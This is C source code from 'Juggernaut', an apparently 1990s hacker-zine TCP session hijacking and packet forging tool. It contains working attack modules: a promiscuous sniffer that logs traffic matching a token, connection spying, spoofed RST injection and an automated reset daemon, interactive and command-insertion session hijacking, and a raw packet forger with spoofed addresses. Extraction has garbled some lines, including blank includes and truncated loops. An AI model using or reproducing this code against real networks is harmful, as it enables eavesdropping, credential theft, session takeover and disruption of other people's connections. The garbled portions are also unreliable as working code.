else printf("\t\t\tControl Flags: %s\n",control);
if(!(packetready&0x20))printf("\t\t\t6. Window Size\n");
else printf("\t\t\tWindow Size: %d\n",window);
if(!(packetready&0x40))printf("\t\t\t7. Data Payload\n");
else printf("\t\t\tData payload: %s\n",data);
printf("\t\t\t8. Return to previous menu\n");
printf("\t\t\t9. Return to main menu\n");
if(packetready==0x7F)printf("\t\t\t10. Pass packet to RIP assembler\n");
printf("\n\n\n\n\n\n\n\n\n\n");
printf(">");
}
/*
* UDP assembly options menu
*/
void mpktaudp(packetready,source,destination,data)
int packetready;
unsigned short source;
unsigned short destination;
char data[512];
{
printf("\t\t\t UDP Packet Assembly\n");
printf("\t\t\t+------------------------------+\n");
if(!(packetready&0x01))printf("\t\t\t1. Source port\n");
else printf("\t\t\tSource port: %d\n",source);
if(!(packetready&0x02))printf("\t\t\t2. Destination port\n");
else printf("\t\t\tDestination port: %d\n",destination);
if(!(packetready&0x04))printf("\t\t\t3. Data payload\n");
else printf("\t\t\tData payload: %s\n",data);
printf("\t\t\t4. Return to previous menu\n");
printf("\t\t\t5. Return to main menu\n");
if(packetready==0x7)printf("\t\t\t6. Pass packet to RIP assembler\n");
printf("\n\n\n\n\n\n\n\n\n\n");
printf(">");
}
/*
* ICMP assembly options menu
*/
void mpktaicmp(packetready,type,code,data)
int packetready;
unsigned short type;
unsigned short code;
char data[512];
{
printf("\t\t\t ICMP Packet Assembly\n");
printf("\t\t\t+------------------------------+\n");
if(!(packetready&0x01))printf("\t\t\t1. Type\n");
else printf("\t\t\tType: %d\n",type);
if(!(packetready&0x02))printf("\t\t\t2. Code\n");
else printf("\t\t\tCode: %d\n",code);
if(!(packetready&0x04))printf("\t\t\t3. Data payload\n");
else printf("\t\t\tData payload: %s\n",data);
printf("\t\t\t4. Return to previous menu\n");
printf("\t\t\t5. Return to main menu\n");
if(packetready==0x07)printf("\t\t\t6. Pass packet to RIP assembler\n");
printf("\n\n\n\n\n\n\n\n\n\n");
printf(">");
}
/*
* IP assembly options menu
*/
void mpktaip(packetready,tos,fflags,fo,ttl,saddr,daddr,number,packettype)
int packetready;
char *tos;
char *fflags;
unsigned short fo;
unsigned short ttl;
char *saddr;
char *daddr;
int number;
char *packettype;
{
printf("\t\t\t IP Packet Assembly\n");
printf("\t\t\t+------------------------------+\n");
if(!(packetready&0x01))printf("\t\t\t1. TOS\n");
else printf("\t\t\tTOS: %s\n",tos);
if(!(packetready&0x02))printf("\t\t\t2. Fragment Flags\n");
else printf("\t\t\tFragment flags: %s\n",fflags);
if(!(packetready&0x04))printf("\t\t\t3. Fragment Offset\n");
else printf("\t\t\tFragment offset: %d\n",(fo&0x1fff));
if(!(packetready&0x08))printf("\t\t\t4. TTL\n");
else printf("\t\t\tTTL: %d\n",ttl);
if(!(packetready&0x10))printf("\t\t\t5. Source Address\n");
else printf("\t\t\tSource Address: %s\n",saddr);
if(!(packetready&0x20))printf("\t\t\t6. Destination Address\n");
else printf("\t\t\tDestination Address: %s\n",daddr);
if(!(packetready&0x40))printf("\t\t\t7. Number of packets to send\n");
else printf("\t\t\tSending %d packet(s)\n",number);
printf("\t\t\t8. Return to previous menu\n");
printf("\t\t\t9. Return to main menu\n");
if(packetready==0x7f)printf("\t\t\t10. Transmit %s packet(s)\n",packettype);
printf("\n\n\n\n\n\n\n\n\n\n");
printf(">");
}
/*
* Clear the Screen
*/
void mwipe(){
printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");
}
<-->
<++> Juggernaut/NumberOneCrush/net.c
/*
*
* Juggernaut
* Version b1
*
* 1996/7 Guild productions
* daemon9[guild|phrack|r00t]
*
* comments to route@infonexus.com
*
* This coding project made possible by a grant from the Guild corporation
*
* net.c - network/socket control code and abstract data types
*
* In the interest of time overhead vs. code size, I created several functions
* that do much the same thing. You will notice the reset and jack code is
* quite redundant. Life is rough like that. Deal with it. Also, there are
* problems with freeing malloc'd memory.
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define DEVICE "eth0"
#define ETHHDR 14
#define PHDR 12
#define TCPHDR 20
#define IPHDR 20
#define BUFSIZE 512
#define MINIBUF 10
#define RSTS 10 /* Number of RSTs to send when RSTing a connection */
#define JCKRST 3 /* You may wish to experiment with this value. The
smaller it is, your command have less time to
complete on the target. However, the ACK storm
will also be much shorter... */
#define SNIFLOG "./juggernaut.log.snif"
struct iphdr *iphp; /* Pointer into current packets IP header */
struct tcphdr *tcphp; /* Pointer into current packets TCP header */
struct ethhdr *ethhp; /* Pointer into current packets ethernet header */
/* Macro to align the pointers into the ethernet,
IP, and TCP headers. */
#define ALIGNNETPOINTERS(){\
ethhp=(struct ethhdr *)(((unsigned long)&epack.eth));\
iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);\
tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);\
}
struct epack{ /* Generic Ethernet packet w/o data payload */
struct ethhdr eth; /* Ethernet Header */
struct iphdr ip; /* IP header */
struct tcphdr tcp; /* TCP header */
char payload[8192]; /* Data Payload */
}epack;
struct connectionInfo{
unsigned long saddr; /* Source IP */
unsigned long daddr; /* Destination IP */
unsigned short sport; /* Source TCP Port */
unsigned short dport; /* Destination TCP Port */
};
jmp_buf env; /* To preserve our environment */
extern int verbosity; /* Should we dump error messages? */
/*
* Creates a low level raw-packet socket and puts the device into promiscuous
* mode.
*/
int tap(device)
char *device;
{
int fd;
struct ifreq ifr; /* Link-layer interface request structure */
/* Ethernet code for IP 0x800==ETH_P_IP */
if((fd=socket(AF_INET,SOCK_PACKET,htons(ETH_P_IP)))<0){
if(verbosity)perror("(tap) SOCK_PACKET allocation problems [fatal]");
exit(1);
}
strcpy(ifr.ifr_name,device);
if((ioctl(fd,SIOCGIFFLAGS,&ifr))<0){ /* Get the device info */
if(verbosity)perror("(tap) Can't get device flags [fatal]");
close(fd);
exit(1);
}
ifr.ifr_flags|=IFF_PROMISC; /* Set promiscuous mode */
if((ioctl(fd,SIOCSIFFLAGS,&ifr))<0){ /* Set flags */
if(verbosity)perror("(tap) Can't set promiscuous mode [fatal]");
close(fd);
exit(1);
}
return(fd);
}
/*
* Gimme a raw-IP socket. Use of IP_HDRINCL is automatic with 2.0.x
* kernels. Not sure about 1.2.x
*/
int rawsock(){
int fd,val=1;
if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
if(verbosity)perror("\n(rawsock) Socket problems [fatal]");
exit(1);
}
#ifdef IP_HDRINCL
if(setsockopt(fd,IPPROTO_IP,IP_HDRINCL,&val,sizeof(val))<0){
if(verbosity){
perror("Cannot set IP_HDRINCL socket option");
fprintf(stderr,"\nIf you are relying on this rather then a hacked kernel to spoof packets, your sunk.\n[cr]");
getchar();
}
}
#endif
return(fd);
}
/*
* Hunter. At this point, only cares about connection information (infant
* connections and tear-downs). I should have it pass SEQ and ACK related
* info to the relevant functions... This function will be forked to the
* backround as a seperate process, and in future versions it will be
* implemented as a seperate thread of execution.
*/
void chunt(){
void add(struct iphdr *,struct tcphdr *,struct ethhdr *);
void del(struct iphdr *,struct tcphdr *);
extern int linksock; /* raw packet socket */
ALIGNNETPOINTERS();
/* No alarm timeout here. We block forever until packets zing by */
while(1)if(recv(linksock,&epack,sizeof(epack),0)){
if(iphp->protocol==IPPROTO_TCP&&(tcphp->syn&&!tcphp->ack))add(iphp,tcphp,ethhp);
if(iphp->protocol==IPPROTO_TCP&&(tcphp->rst||tcphp->fin))del(iphp,tcphp);
}
}
/*
* addc() wrapper. Checks to make sure we want to add this connection to
* our list.... At this point, we'll take ftp control, ssh (well, we can
* RST them) telnet, smtp, http, rlogin, and irc.
*/
void add(iphp,tcphp,ethhp)
struct iphdr *iphp;
struct tcphdr *tcphp;
struct ethhdr *ethhp; /* Future Use */
{
char *addc(struct iphdr *, struct tcphdr *);
char *msg;
#ifdef GREED
if(((int)msg=addc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
#ifdef NOHUSH
fprintf(stderr,"%c",7);
#endif
return;
#else
switch(ntohs(tcphp->dest)){
case 21:
case 22:
case 23:
case 25:
case 80:
case 513:
case 6667:
if(((int)msg=addc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
#ifdef NOHUSH
fprintf(stderr,"%c",7);
#endif
return;
default:
return;
}
#endif
}
/*
* delc() wrapper. Checks connection port number to see if we should even
* bother passing to the delete function which will do a potentially expensive
* linear search...
*/
void del(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
char *delc(struct iphdr *, struct tcphdr *);
char *msg;
#ifdef GREED
if(((int)msg=delc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
return;
#else
switch(ntohs(tcphp->dest)){
case 21:
case 22:
case 23:
case 25:
case 80:
case 513:
case 6667:
if(((int)msg=delc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
return;
default:
return;
}
#endif
}
/*
* Spy on a connection. If the packet captured is from the target connection,
* call dumpp(). If fp is valid, prepend header/append footer.
*/
void cspy(target,fp)
struct connectionInfo *target;
FILE *fp;
{
char *hostLookup(unsigned long);
void dumpp(char *,int,FILE *);
extern int sigsentry;
int tlinksock=tap(DEVICE); /* Spying tap. XXX- Really dumb way to do this... */
time_t tp;
ALIGNNETPOINTERS();
fprintf(stderr,"Spying on connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport));
if(fp){
fprintf(fp,"---------------------------------------------------------------------\n: Juggernaut connection spy log header\n: %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup(target->daddr),ntohs(target->dport));
time(&tp);
fprintf(fp,": Log started:\t\t%s---------------------------------------------------------------------\n",ctime(&tp));
}
/* NO alaram timeout here. SIGINT kills our spy session */
while(sigsentry)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP)if(iphp->saddr==target->daddr&&tcphp->source==target->dport)dumpp(epack.payload-2,htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp),fp);
if(fp){
fprintf(fp,"\n---------------------------------------------------------------------\n: Juggernaut connection spy log trailer\n: %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup(target->daddr),ntohs(target->dport)
);
time(&tp);
fprintf(fp,": Log ended:\t\t%s---------------------------------------------------------------------\n",ctime(&tp));
}
close(tlinksock);
}
/*
* Dumps the payload. Dump to file if we have a valid FP.
*/
void dumpp(payload,length,fp)
char *payload;
int length;
FILE *fp;
{
register int tickytacky=0;
for(;tickytackydport;
sin.sin_addr.s_addr=target->saddr;
bzero(&tpack,sizeof(tpack)); /* Zero out these structures so I dunot
have to assign 0's to the unused
areas... */
bzero(&ppheader,sizeof(ppheader));
tpack.tcp.source=target->dport; /* 16-bit Source port number */
tpack.tcp.dest=target->sport; /* 16-bit Destination port */
tpack.tcp.doff=5; /* Data offset */
tpack.tcp.ack=1; /* Acknowledgement field valid flag */
tpack.tcp.rst=1; /* Reset flag */
tpack.tcp.window=htons(242); /* 16-bit Window size */
tpack.ip.version=4; /* 4-bit Version */
tpack.ip.ihl=5; /* 4-bit Header Length */
tpack.ip.tot_len=htons(IPHDR+TCPHDR); /* 16-bit Total length */
tpack.ip.ttl=64; /* 8-bit Time To Live */
tpack.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */
tpack.ip.saddr=target->daddr; /* 32-bit Source Address */
tpack.ip.daddr=target->saddr; /* 32-bit Destination Address */
tempBuf=(char *)malloc(PHDR+TCPHDR); /* Checksum stuff */
ppheader=(struct psuedoHeader *)tempBuf;
ppheader->saddr=tpack.ip.saddr;
ppheader->daddr=tpack.ip.daddr;
ppheader->prot=IPPROTO_TCP;
ppheader->null=0;
ppheader->tlen=htons(TCPHDR);
fprintf(stderr,"Reseting connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport));
if(setjmp(env)){ /* Timeout */
if(verbosity)fprintf(stderr,"Quiet connection, not reset. [soft error, returning]\n");
return;
}
signal(SIGALRM,nettimeout);
alarm(netreadtimeout); /* Wait 10 seconds for reply */
while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->saddr&&tcphp->source==target->sport){
for(;mootack_seq+(htonl(moot));
tpack.tcp.ack_seq=tcphp->seq+(htonl(moot));
bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR);
tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR);
sendto(ripsock,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
}
alarm(0);
/*free(tempBuf); XXX */
fprintf(stderr,"Connection torn down.\n");
close(tlinksock);
break;
}
}
/*
* Sets up automated connection reseting. A source and possibly a
* destination host are targeted for reseting. This function will kill any
* connection attempts from the source (and possibly to a destination).
*/
void acrst(source,target)
unsigned long source, target;
{
char *hostLookup(unsigned long);
unsigned short in_cksum(unsigned short *,int);
void spasm(); /* Handles the user defined signal */
struct tpack{
struct iphdr ip;
struct tcphdr tcp;
}tpack;
struct psuedoHeader{
unsigned long saddr;
unsigned long daddr;
unsigned char null;
unsigned char prot;
unsigned short tlen;
}*ppheader;
struct sockaddr_in sin;
int moot=0;
extern int ripsock;
extern int acrstpid;
char *tempBuf=0;
int tlinksock=tap(DEVICE);
switch((acrstpid=fork())){ /* Drop a child to backround, return the
parent to continue */
case 0: /* Set the priority up a few notchs..
I get better results */
if(setpriority(PRIO_PROCESS,0,-20)){
if(verbosity)perror("acrst module (setpriority)");
fprintf(stderr,"[cr]");
getchar();
}
signal(SIGUSR1,spasm); /* Keep track of the child and register
it with the cleanup signal handler */
signal(SIGINT,SIG_IGN);
signal(SIGQUIT,SIG_IGN);
break;
default:
return;
case -1:
if(verbosity)perror("acrst module Internal forking error [fatal]");
exit(1);
}
ALIGNNETPOINTERS();
/* Preload these values. */
sin.sin_family=AF_INET;
bzero(&tpack,sizeof(tpack));
bzero(&ppheader,sizeof(ppheader));
tpack.tcp.doff=5;
tpack.tcp.ack=1;
tpack.tcp.rst=1;
tpack.tcp.window=htons(242);
tpack.ip.version=4;
tpack.ip.ihl=5;
tpack.ip.tot_len=htons(IPHDR+TCPHDR);
tpack.ip.ttl=64;
tpack.ip.protocol=IPPROTO_TCP;
tempBuf=(char *)malloc(PHDR+TCPHDR);
ppheader=(struct psuedoHeader *)tempBuf;
ppheader->null=0;
ppheader->prot=IPPROTO_TCP;
ppheader->tlen=htons(TCPHDR);
while(1){
if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&tcphp->syn&&iphp->saddr==source){
if(target)if(iphp->daddr!=target)continue;
sin.sin_port=tcphp->dest;
sin.sin_addr.s_addr=iphp->saddr;
tpack.tcp.source=tcphp->dest;
tpack.tcp.dest=tcphp->source;
for(moot=1;mootseq+(htonl(moot));
tpack.tcp.check=0;
tpack.ip.saddr=iphp->daddr;
tpack.ip.daddr=iphp->saddr;
tpack.ip.check=0;
ppheader->saddr=tpack.ip.saddr;
ppheader->daddr=tpack.ip.daddr;
bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR);
tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR);
sendto(ripsock,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
fprintf(stderr,"%c-%c*",0x08,0x08);
}
}
}
}
/*
* Simplex-hijack. Really just inserts a command into the TCP stream. This
* will totally desynch the connection however and cause two things to happen:
* 1) an ACK storm of epic proportions (maybe not, see accompanying paper) and
* 2) the target user will have her connection destroyed. To alleviate the
* first problem, we simply reset the connection shortly after we hijack it.
* The second problem is a burden with this kind of hijacking.
*/
void csimplexhijack(target,commandbuf)
struct connectionInfo *target;
char *commandbuf;
{
void nettimeout();
char *hostLookup(unsigned long);
unsigned short in_cksum(unsigned short *,int);
struct tpack{ /* Generic TCP packet */
struct iphdr ip;
struct tcphdr tcp;
char payload[BUFSIZE];
}tpack;
struct psuedoHeader{
unsigned long saddr;
unsigned long daddr;
unsigned char null;
unsigned char prot;
unsigned short tlen;
}*ppheader;
struct sockaddr_in sin;
extern int ripsock;
extern int netreadtimeout;
static int len;
char *tempBuf;
int tlinksock=tap(DEVICE);
ALIGNNETPOINTERS();
bzero(&tpack,sizeof(tpack));
len=strlen(commandbuf)+1;
bcopy(commandbuf,tpack.payload,len--);
sin.sin_family=AF_INET;
sin.sin_port=target->sport;
sin.sin_addr.s_addr=target->daddr;
tpack.tcp.source=target->sport;
tpack.tcp.dest=target->dport;
tpack.tcp.doff=5;
tpack.tcp.ack=1;
tpack.tcp.psh=1;
tpack.tcp.window=htons(242);
tpack.ip.version=4;
tpack.ip.ihl=5;
tpack.ip.tot_len=htons(IPHDR+TCPHDR+len);
tpack.ip.ttl=64;
tpack.ip.protocol=IPPROTO_TCP;
tpack.ip.saddr=target->saddr;
tpack.ip.daddr=target->daddr;
tempBuf=(char *)malloc(PHDR+TCPHDR+len); /* Check me out y0 */
ppheader=(struct psuedoHeader *)tempBuf;
ppheader->saddr=tpack.ip.saddr;
ppheader->daddr=tpack.ip.daddr;
ppheader->null=0;
ppheader->prot=IPPROTO_TCP;
ppheader->tlen=htons(TCPHDR+len);
fprintf(stderr,"(simplex) Hijacking connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport));
if(setjmp(env)){ /* Timeout */
if(verbosity)fprintf(stderr,"Quiet connection, try again later. [soft error, returning]\n");
return;
}
signal(SIGALRM,nettimeout);
alarm(0);
alarm(netreadtimeout); /* Wait 10 seconds for reply */
while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){
tpack.tcp.seq=tcphp->ack_seq;
tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1);
bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR+len);
tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len);
sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin));
fprintf(stderr,"Command inserted, connection desynched.\n");
sleep(JCKRST); /* Don't reset the connection too quickly, or
our command may not complete */
crst(target);
close(tlinksock);
/* free(tempBuf); XXX */
break;
}
}
/*
* Hijack. Desynchs the server from the client. The resulting ACK storm
* makes things very difficult.
*/
void chijack(target)
struct connectionInfo *target;
{
void nettimeout();
void seizure();
char *hostLookup(unsigned long);
unsigned short in_cksum(unsigned short *,int);
struct tpack{
struct iphdr ip;
struct tcphdr tcp;
char payload[2*BUFSIZE];
}tpack;
struct psuedoHeader{
unsigned long saddr;
unsigned long daddr;
unsigned char null;
unsigned char prot;
unsigned short tlen;
}*ppheader;
struct sockaddr_in sin;
char buf[10*MINIBUF];
char *tempBuf=0;
extern int ripsock;
extern int netreadtimeout;
extern int sigsentry;
static int len;
int tlinksock=tap(DEVICE);
ALIGNNETPOINTERS();
bzero(&tpack,sizeof(tpack));
sin.sin_family=AF_INET;
sin.sin_port=target->sport;
sin.sin_addr.s_addr=target->daddr;
tpack.tcp.source=target->sport;
tpack.tcp.dest=target->dport;
tpack.tcp.doff=5;
tpack.tcp.ack=1;
tpack.tcp.psh=1;
tpack.tcp.window=htons(1024);
tpack.ip.version=4;
tpack.ip.ihl=5;
tpack.ip.ttl=64;
tpack.ip.protocol=IPPROTO_TCP;
tpack.ip.saddr=target->saddr;
tpack.ip.daddr=target->daddr;
tempBuf=(char *)malloc(PHDR+TCPHDR+len);
ppheader=(struct psuedoHeader *)tempBuf;
ppheader->saddr=tpack.ip.saddr;
ppheader->daddr=tpack.ip.daddr;
ppheader->null=0;
ppheader->prot=IPPROTO_TCP;
signal(SIGINT,seizure);
fprintf(stderr,"Hijacking connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport));
fprintf(stderr,"'ctrl-c' when you are finished (this will RST the connection).\n");
fprintf(stderr,"juggernaut>");
fgets(buf,sizeof(buf),stdin);
len=strlen(buf)+1;
bcopy(buf,tpack.payload,len--);
tpack.ip.tot_len=htons(IPHDR+TCPHDR+len);
ppheader->tlen=htons(TCPHDR+len);
if(setjmp(env)){
if(verbosity)fprintf(stderr,"Quiet connection, try again later. [soft error, returning]\n");
return;
}
signal(SIGALRM,nettimeout);
alarm(0);
alarm(netreadtimeout);
/* Here we setup the initial hijack state. We
need to desynch the connection, and the next
packet that comes by will be the catalyst. */
while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){
tpack.tcp.seq=tcphp->ack_seq;
tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1);
bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR+len);
tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len);
sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin));
break;
}
alarm(0);
while(sigsentry){ /* Main hijack loop */
if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){
if(!tcphp->psh)continue; /* If this is not data, ignore it */
dumpp(epack.payload-2,htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp),0);
bzero(&buf,sizeof(buf));
fgets(buf,sizeof(buf),stdin);
if(!buf[1])continue; /* No input data (CR) */
len=strlen(buf)+1;
bcopy(buf,tpack.payload,len--);
tpack.tcp.psh=1;
tpack.tcp.check=0;
tpack.ip.check=0;
tpack.ip.tot_len=htons(IPHDR+TCPHDR+len);
tpack.tcp.seq=tcphp->ack_seq;
tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1);
ppheader->tlen=htons(TCPHDR+len);
bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR+len);
tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len);
sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin));
}
}
crst(target);
/*free(tempBuf); XXX */
close(tlinksock);
}
/*
* Packet sniffer parses TCP packets for token. Logs that packet, along with
* the next 'enticement` number of packets. Not really all that robust.
*/
void bloodhound(token,enticementfactor)
char *token;
int enticementfactor;
{
void parsep(char *,int,FILE *);
void shadow();
char *hostLookup(unsigned long);
FILE *fp=0;
time_t tp=0;
int length=0;
int grabflag=0; /* Time to grab some packets */
unsigned long targetsourceip=0;
unsigned short targetsourceport=0;
int tlinksock=tap(DEVICE);
if(!(fp=fopen(SNIFLOG,"a+"))){ /* Log to file */
if(verbosity){
fprintf(stderr,"Cannot open file for logging. [fatal]\n");
fprintf(stderr,"[cr]");
}
exit(0);
}
ALIGNNETPOINTERS();
fprintf(stderr,"\nDropping to background, sniffing for smarmy tidbits...\n");
shadow(); /* Dropped to the background */
fprintf(stderr,"\nSend a SIGKILL to %d when you are thorugh.\n",getpid());
fprintf(fp,"\n---------------------------------------------------------------------\n[ Juggernaut bloodhound module log: token == '%s' ]\n",token);
time(&tp);
fprintf(fp,"[ Log started:\t\t%s---------------------------------------------------------------------\n",ctime(&tp));
fflush(fp);
while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP){
length=htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp);
if((!grabflag)&&(strstr((epack.payload-2),token))){
grabflag=enticementfactor;
targetsourceip=iphp->saddr;
targetsourceport=tcphp->source;
fprintf(fp,"\n\t %s [%d]\t<-->\t %s [%d]\n",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest));
parsep(epack.payload-2,length,fp);
}
if(grabflag){ /* We have a session marked and are
logging it */
if(iphp->daddr==targetsourceip&&tcphp->dest==targetsourceport){
parsep(epack.payload-2,length,fp);
grabflag--;
}
}
}
/* NOTREACHED */
}
/*
* Packet parser. Print the packet out...
*/
void parsep(payload,length,fp)
char *payload;
int length;
FILE *fp;
{
register int tickytacky=0;
for(tickytacky=0;tickytacky
<++> Juggernaut/NumberOneCrush/prometheus.c
/*
*
* Juggernaut
* Version b2
*
* 1996/7 Guild productions
* daemon9[guild|phrack|r00t]
*
* comments to route@infonexus.com
*
* This coding project made possible by a grant from the Guild corporation
*
* prometheus.c - the packet assemby workshop module. Each of the main
* packet assembly subfunctions will end up calling the ip assembler to build
* the IP portion and send it (them) out.
*
* Too many dependencies in menu.c
*
* Shout out to Nirva for some suggestions/help. Nirva rules, BTW. I love
* Nirva. You should too.
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define MINIBUF 10
#define BUFSIZE 512
#define ETHHDR 14
#define PHDR 12
#define TCPHDR 20
#define UDPHDR 8
#define IPHDR 20
#define NOTRANSPORT 0x00
#define TCPTRANSPORT 0x01
#define UDPTRANSPORT 0x02
#define ICMPTRANSPORT 0x04
struct tpak{ /* TCP packet */
struct tcphdr tcp;
char payload[BUFSIZE];
}tpack;
struct upak{ /* UDP packet */
struct udphdr udp;
char payload[BUFSIZE];
}upack;
struct ipak{ /* ICMP packet */
struct icmphdr icmp;
char payload[BUFSIZE];
}ipack;
struct rippak{ /* IP packet */
struct iphdr ip;
char payload[BUFSIZE+20]; /* Payload + transport header */
}rippack;
int woe; /* Global var to let us know where to return
to... */
extern int verbosity;
/* This will change when IP/TCP options are
implemented... */
#define RIPPACKETSIZE 552 /* IP header + transport header of up to 20
bytes + 512 byte payload */
int prometheus(type)
int type;
{
void tcpa();
void udpa();
void icmpa();
void igmpa();
void ripa(int);
bzero(&rippack,sizeof(rippack));
woe=0;
switch(type){
case 1:
tcpa(); /* TCP */
break;
case 2:
udpa(); /* UDP */
break;
case 3:
icmpa(); /* ICMP */
break;
case 4:
ripa(NOTRANSPORT); /* RAW IP with no transport and no payload */
break;
case 5:
return(woe=1); /* Done assembling packets */
default:
break; /* bad input -- not done */
}
return(woe);
}
/*
* TCP assembler
*/
void tcpa(){
void ripa(int);
void mwipe();
void mpktatcp(int,unsigned short,unsigned short,unsigned long,unsigned long,char *,unsigned short,char *);
char buf[2*MINIBUF];
unsigned long val;
int packetready=0; /* flag bits */
char data[4*MINIBUF]={0},flags[MINIBUF]={0},filename[4*MINIBUF]={0};
int i,j,fd,loopsentry=1;
bzero(&tpack,sizeof(tpack));
srandom((unsigned)time(0)); /* seed psuedo random number generator */
while(loopsentry){
mwipe();
mpktatcp(packetready,ntohs(tpack.tcp.source),ntohs(tpack.tcp.dest),ntohl(tpack.tcp.seq),ntohl(tpack.tcp.ack_seq),flags,ntohs(tpack.tcp.window),data);
fgets(buf,sizeof(buf),stdin);
if(!(val=atoi(buf)))continue;
switch(val){
case 1: /* Source Port */
fprintf(stderr,"\nSource Port (0 - 65535) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
tpack.tcp.source=htons(random()&0xffff);
packetready|=0x01;
break;
}
if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){
if(packetready&0x01)packetready^=0x01; /* Clear flag
if set */
tpack.tcp.source=0;
break;
}
tpack.tcp.source=htons(val);
packetready|=0x01;
break;
case 2: /* Destination Port */
fprintf(stderr,"\nDestination Port (0 - 65535) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
tpack.tcp.dest=htons(random()&0xffff);
packetready|=0x02;
break;
}
if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){
if(packetready&0x02)packetready^=0x02;
tpack.tcp.dest=0;
break;
}
tpack.tcp.dest=htons(val);
packetready|=0x02;
break;
case 3: /* Sequence Number */
fprintf(stderr,"\nSequence Number (0 - 4294967295) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
tpack.tcp.seq=htonl(random());
packetready|=0x04;
break;
}
if(buf[0]=='q'||buf[0]=='-'){
if(packetready&0x04)packetready^=0x04;
tpack.tcp.seq=0;
break;
}
tpack.tcp.seq=htonl(strtoul(buf,0,10));
packetready|=0x04;
break;
case 4: /* Acknowledgement Number */
fprintf(stderr,"\nAcknowledgement Number (0 - 4294967295) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
tpack.tcp.ack_seq=htonl(random());
packetready|=0x08;
break;
}
if(buf[0]=='q'||buf[0]=='-'){
if(packetready&0x08)packetready^=0x08;
tpack.tcp.ack_seq=0;
break;
}
tpack.tcp.ack_seq=htonl(strtoul(buf,0,10));
packetready|=0x08;
break;
case 5: /* Control Flags */
i=0;
bzero(flags,sizeof(flags));
fprintf(stderr,"\nURG? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
tpack.tcp.urg=0;
break;
}
if(buf[0]=='y'){
tpack.tcp.urg=1;
flags[i++]='U';
}
fprintf(stderr,"\nACK? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
tpack.tcp.ack=0;
break;
}
if(buf[0]=='y'){
tpack.tcp.ack=1;
flags[i++]='A';
}
